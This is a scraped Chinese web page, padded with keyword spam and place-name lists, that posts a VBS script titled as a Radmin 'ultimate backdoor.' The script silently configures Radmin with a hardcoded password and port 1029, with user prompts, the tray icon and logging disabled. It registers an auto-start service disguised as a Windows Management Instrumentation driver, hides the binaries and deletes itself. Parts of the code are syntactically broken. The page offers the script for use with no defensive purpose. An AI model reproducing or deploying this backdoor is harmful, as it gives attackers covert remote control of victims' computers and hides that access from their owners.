濮阳杆衣贸易有限公司

主頁(yè) > 知識(shí)庫(kù) > Vbs腳本實(shí)現(xiàn)radmin終極后門(mén)代碼_刪除自身

Vbs腳本實(shí)現(xiàn)radmin終極后門(mén)代碼_刪除自身
熱門(mén)標(biāo)簽:墨西哥地圖標(biāo)注app 外呼系統(tǒng)群 機(jī)器人打電銷(xiāo)適用于美業(yè)嗎 智云億呼電話機(jī)器人 外呼系統(tǒng)說(shuō)話聲音小怎么辦 企業(yè)400電話辦理價(jià)錢(qián)低 天津智能外呼系統(tǒng)排名 上海辦理400電話選號(hào) 龍巖400電話申請(qǐng)


復(fù)制代碼 代碼如下:

on error resume next 
const HKEY_LOCAL_MACHINE = H80000002 
strComputer = "." 
Set StdOut = WScript.StdOut 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _  
strComputer  "\root\default:StdRegProv") 
strKeyPath = "SYSTEM\RAdmin" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath 
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") 
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) 
uBinary = Array(1,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) 
uBinary = Array(0,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) 
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)        //此為注冊(cè)表導(dǎo)出十六進(jìn)制轉(zhuǎn)為十進(jìn)制數(shù)據(jù) pass:241241241 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)    //Radmin密碼 
uBinary = Array(5,4,0,0)      //端口:1029 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) 
uBinary = Array(10,0,0,0) 
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" strComputer "\root\default:StdRegProv") 
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" 
strValueName = "LogFilePath" 
strValue = "c:\logfile.txt" 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0) 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" strComputer "\root\default:StdRegProv") 
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp" 
strValueName = "Description" 
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers." 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
strValueName = "DisplayName" 
strValue = "Windows Management Instrumentation Player Drivers" 
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
strValueName = "ImagePath" 
strValue = "c:\windows\system32\Exporer.exe /service" 
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("net start WinManageHelp",0) 
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) 
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) 
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) 
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)    //自刪除

最好的刪除代碼不錯(cuò)
createobject("scripting.filesystemobject").deletefile(script.scriptname)

您可能感興趣的文章:
  • 批處理程序刪除自身 bat批處理
  • VBS腳本和BAT批處理刪除自身的方法
  • 批處理刪除自身的命令小結(jié)
  • vbs后臺(tái)運(yùn)行bat刪除自身的代碼
  • 原來(lái)ASP和PHP都是可以刪除自身的
  • ASP和PHP都是可以刪除自身的

標(biāo)簽:青島 鄂爾多斯 齊齊哈爾 黃山 承德 錫林郭勒盟 麗水 阜新

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《Vbs腳本實(shí)現(xiàn)radmin終極后門(mén)代碼_刪除自身》,本文關(guān)鍵詞  Vbs,腳本,實(shí)現(xiàn),radmin,終極,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《Vbs腳本實(shí)現(xiàn)radmin終極后門(mén)代碼_刪除自身》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于Vbs腳本實(shí)現(xiàn)radmin終極后門(mén)代碼_刪除自身的相關(guān)信息資訊供網(wǎng)民參考!
    • 推薦文章
    新田县| 虞城县| 凤翔县| 杨浦区| 瓦房店市| 金川县| 双鸭山市| 邹城市| 安义县| 东丽区| 松潘县| 怀宁县| 渝北区| 台州市| 逊克县| 台南县| 章丘市| 乌兰浩特市| 丹江口市| 哈巴河县| 盐边县| 定边县| 砚山县| 交城县| 台湾省| 康平县| 阿拉尔市| 隆林| 巫溪县| 蒙阴县| 柏乡县| 措勤县| 洞口县| 宜阳县| 苗栗县| 彝良县| 双鸭山市| 会宁县| 左权县| 茌平县| 修文县|